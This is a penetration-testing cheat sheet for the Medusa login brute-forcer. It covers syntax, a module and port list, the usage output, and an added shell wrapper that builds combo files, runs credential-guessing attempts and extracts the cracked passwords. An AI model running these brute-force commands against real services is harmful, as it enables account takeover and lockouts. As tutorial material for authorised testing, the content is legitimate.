control – medusa passwords

BackTrack 5 R1

Basic syntax (one host, one username, a password list):

medusa -h (IP Address) -u (Username) -P (Location of password file) -M telnet -t1 -f -e ns

-t1 runs one login attempt at a time against the host (keeps the noise down and makes account-lockout thresholds easier to stay under), -f stops against that host after the first valid username/password, and -e ns additionally tries a blank password (n) and the username as the password (s) for every user. Swap the module after -M for the service you are targeting; the example below uses rlogin instead of telnet:

root@bt:~# medusa -h 192.168.0.1 -u admin -P /pentest/passwords/wordlists/darkc0de.lst -M rlogin -t1 -f -e ns

modules you can pass to -M instead of telnet (default port after the name; override it with -n, enable SSL with -s)

ftp – 21
http – 80
imap – 143
mssql – 1433
mysql – 3306
ncp – 524
nntp – 119
pcanywhere – 5631
pop3 – 110
postgres – 5432
rexec – 512
rlogin – 513
rsh – 514
smbnt – 445 (falls back to 139)
smtp – 25
smtp-vrfy – 25 (user enumeration via VRFY, not a password check)
snmp – 161
ssh – 22
svn – 3690
telnet – 23
vmauthd – 902
vnc – 5900
web-form – 80 (443 with -s; form fields are passed with -m)
wrapper – no fixed port (drives an external program)

modules location (medusa -d lists the ones actually compiled in)
/usr/local/lib/medusa/modules/

Usage output from Medusa v2.0, printed when a required option is missing:

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ALERT: User logon information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT]    : Target hostname or IP address
-H [FILE]    : File containing target hostnames or IP addresses
-u [TEXT]    : Username to test
-U [FILE]    : File containing usernames to test
-p [TEXT]    : Password to test
-P [FILE]    : File containing passwords to test
-C [FILE]    : File containing combo entries. See README for more information.
-O [FILE]    : File to append log information to
-e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT]    : Name of the module to execute (without the .mod extension)
-m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
               different parameter each time and they will all be sent to the module (i.e.
               -m Param1 -m Param2, etc.)
-d           : Dump all known modules
-n [NUM]     : Use for non-default TCP port number
-s           : Enable SSL
-g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
-r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
-R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM]     : Total number of logins to be tested concurrently
-T [NUM]     : Total number of hosts to be tested concurrently
-L           : Parallelize logins using one username per thread. The default is to process
               the entire username before proceeding.
-f           : Stop scanning host after first valid username/password found.
-F           : Stop audit after first valid username/password found on any host.
-b           : Suppress startup banner
-q           : Display module's usage information
-v [NUM]     : Verbose level [0 - 6 (more)]
-w [NUM]     : Error debug level [0 - 10 (more)]
-V           : Display version
-Z [TEXT]    : Resume scan based on map of previous scan
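As an added example (not part of the original post and not Medusa's own code), a small POSIX sh wrapper around the workflow above: it builds a -C combo file in the host:user:password format from a host list and a user list, assembles the medusa command line with the options discussed (-t 1, -f, -e ns, -O, -n, -r/-R), and filters a Medusa log down to the ACCOUNT FOUND lines as module,host,user,password. The addresses, file names, function names and the sample log lines are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the original post. All hosts, users and log
# lines below are constructed; function names are my own.

# Build a -C combo file: one "host:user:password" line per pair. Leaving
# the password field empty makes Medusa take passwords from -p/-P.
medusa_combo() {   # usage: medusa_combo hosts.txt users.txt > combo.txt
    hosts="$1"; users="$2"
    while read -r h || [ -n "$h" ]; do
        [ -n "$h" ] || continue
        while read -r u || [ -n "$u" ]; do
            [ -n "$u" ] || continue
            printf '%s:%s:\n' "$h" "$u"
        done < "$users"
    done < "$hosts"
}

# Assemble the command line. Same choices as the post: one login at a
# time per host (-t 1), stop on the first hit per host (-f), blank and
# username-as-password checks (-e ns), plus an append-only log (-O), a
# non-default port when given (-n) and spaced, capped connection retries
# (-r 5 -R 2) so a flaky service is not hammered.
medusa_cmd() {   # usage: medusa_cmd module combo.txt passwords.txt log.txt [port]
    mod="$1"; combo="$2"; pw="$3"; log="$4"; port="${5:-}"
    cmd="medusa -C $combo -P $pw -M $mod -t 1 -f -e ns -r 5 -R 2 -O $log"
    if [ -n "$port" ]; then
        cmd="$cmd -n $port"
    fi
    printf '%s\n' "$cmd"
}

# Run it if medusa is installed, otherwise just show what would run.
medusa_run() {
    cmd=$(medusa_cmd "$@")
    if command -v medusa >/dev/null 2>&1; then
        $cmd
    else
        printf 'medusa not found; would run: %s\n' "$cmd" >&2
    fi
}

# Reduce a Medusa log (or its stdout) to "module,host,user,password".
# A hit is reported as:
#   ACCOUNT FOUND: [ssh] Host: 10.0.0.5 User: root Password: toor [SUCCESS]
# Passwords may contain spaces, so the Password field is taken greedily up
# to the trailing " [SUCCESS]"; ACCOUNT CHECK progress lines are dropped.
medusa_found() {   # usage: medusa_found < medusa.log
    sed -n 's/^ACCOUNT FOUND: \[\([^]]*\)] Host: \([^ ]*\) User: \([^ ]*\) Password: \(.*\) \[SUCCESS]$/\1,\2,\3,\4/p'
}

# Constructed sample of what Medusa prints (not a real run).
medusa_sample_log() {
    printf '%s\n' \
      'ACCOUNT CHECK: [rlogin] Host: 192.168.0.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 3 complete)' \
      'ACCOUNT FOUND: [rlogin] Host: 192.168.0.1 User: admin Password: pass word [SUCCESS]' \
      'ACCOUNT FOUND: [ssh] Host: 192.168.0.2 User: root Password: toor [SUCCESS]'
}

# Demo on the constructed sample; prints two CSV lines.
medusa_sample_log | medusa_found
```

Before pointing this at a real target, check the account-lockout policy of the service: -e ns adds two attempts per user on top of the wordlist, and -t 1 only limits concurrency per host, not the total number of attempts. Feed medusa_found the -O log rather than a terminal scrollback so the hits survive a long run.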
